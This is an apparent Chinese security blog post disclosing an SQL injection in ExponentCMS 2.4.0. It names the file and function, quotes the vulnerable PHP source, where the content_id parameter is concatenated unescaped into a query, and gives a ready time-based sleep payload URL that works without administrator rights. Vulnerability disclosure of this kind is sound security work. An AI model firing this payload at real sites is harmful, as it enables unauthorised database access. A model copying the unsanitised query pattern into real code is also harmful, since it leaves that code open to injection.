最新消息:

ExponentCMS SQL Injection V2.4.0

源码审计 pang0lin 915浏览 0评论

SQL Injection 2.4.0

File:

framework/core/expCommentContorller.php

Function:

showComments

Line:

#132

Explain:

param content_id is not check, visiting the page need no administrator permission.

Payload: http://www.xxx.com/expComment/showComments/content_id/11%20or%20sleep(10)

Images:

1111

Payload:

112

Code:

function showComments() {

global $user, $db;

 

/* The global constants can be overridden by passing appropriate params */

//sure wish I could do this once in the constructor. sadly $this->params[] isn’t set yet

$require_login = empty($this->params[‘require_login’]) ? COMMENTS_REQUIRE_LOGIN : intval($this->params[‘require_login’]);

$require_approval = empty($this->params[‘require_approval’]) ? COMMENTS_REQUIRE_APPROVAL : intval($this->params[‘require_approval’]);

$require_notification = empty($this->params[‘require_notification’]) ? COMMENTS_REQUIRE_NOTIFICATION : intval($this->params[‘require_notification’]);

$notification_email = empty($this->params[‘notification_email’]) ? COMMENTS_NOTIFICATION_EMAIL : expString::escape($this->params[‘notification_email’]);

 

//        $sql  = ‘SELECT c.*, ua.image, u.username FROM ‘.$db->prefix.’expComments c ‘;

//        $sql .= ‘JOIN ‘.$db->prefix.’content_expComments cnt ON c.id=cnt.expcomments_id ‘;

//        $sql .= ‘JOIN ‘.$db->prefix.’user_avatar ua ON c.poster=ua.user_id ‘;

//        $sql .= ‘JOIN ‘.$db->prefix.’user u ON c.poster=u.id ‘;

//        $sql .= ‘WHERE cnt.content_id=’.$this->params[‘content_id’].” AND cnt.content_type='”.$this->params[‘content_type’].”‘ “;

 

$sql  = ‘SELECT c.* FROM ‘.$db->prefix.’expComments c ‘;

$sql .= ‘JOIN ‘.$db->prefix.’content_expComments cnt ON c.id=cnt.expcomments_id ‘;

$sql .= ‘WHERE cnt.content_id=’.$this->params[‘content_id’].” AND cnt.content_type='”.expString::escape($this->params[‘content_type’]).”‘ “;

if (!$user->isAdmin()) {

$sql .= ‘AND c.approved=1′;

}

 

$comments = new expPaginator(array(

//’model’=>’expComment’,

‘sql’=>$sql,

//            ‘limit’=>999,

‘order’=>’created_at’,

‘page’=>(isset($this->params[‘page’]) ? $this->params[‘page’] : 1),

‘controller’=>$this->baseclassname,

‘action’=>$this->params[‘action’],

‘columns’=>array(

gt(‘Readable Column Name’)=>’Column Name’

),

));

 

// add username and avatar

foreach ($comments->records as $key=>$record) {

$commentor = new user($record->poster);

//FIXME here is where we might sanitize the comments before displaying them

//            $comments->records[$key]->username = $commentor->username;  //FIXME this should follow the site attribution setting

$comments->records[$key]->username = user::getUserAttribution($commentor->id);  // follow the site attribution setting

$comments->records[$key]->avatar = $db->selectObject(‘user_avatar’,”user_id='”.$record->poster.”‘”);

}

 

if (empty($this->params[‘config’][‘disable_nested_comments’])) $comments->records = self::arrangecomments($comments->records);

// eDebug($sql, true);

 

// count the unapproved comments

if ($require_approval == 1 && $user->isAdmin()) {

$sql  = ‘SELECT count(com.id) as c FROM ‘.$db->prefix.’expComments com ‘;

$sql .= ‘JOIN ‘.$db->prefix.’content_expComments cnt ON com.id=cnt.expcomments_id ‘;

$sql .= ‘WHERE cnt.content_id=’.$this->params[‘content_id’].” AND cnt.content_type='”.expString::escape($this->params[‘content_type’]).”‘ “;

$sql .= ‘AND com.approved=0’;

$unapproved = $db->countObjectsBySql($sql);

} else {

$unapproved = 0;

}

 

$this->config = $this->params[‘config’];

$type = !empty($this->params[‘type’]) ? $this->params[‘type’] : gt(‘Comment’);

$ratings = !empty($this->params[‘ratings’]) ? true : false;

 

assign_to_template(array(

‘comments’=>$comments,

‘config’=>$this->params[‘config’],

‘unapproved’=>$unapproved,

‘content_id’=>$this->params[‘content_id’],

‘content_type’=>$this->params[‘content_type’],

‘user’=>$user,

‘hideform’=>$this->params[‘hideform’],

‘hidecomments’=>$this->params[‘hidecomments’],

‘title’=>$this->params[‘title’],

‘formtitle’=>$this->params[‘formtitle’],

‘type’=>$type,

‘ratings’=>$ratings,

‘require_login’=>$require_login,

‘require_approval’=>$require_approval,

‘require_notification’=>$require_notification,

‘notification_email’=>$notification_email,

));

}

 

转载请注明:我是穿山甲,小弟穿山乙 » ExponentCMS SQL Injection V2.4.0

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址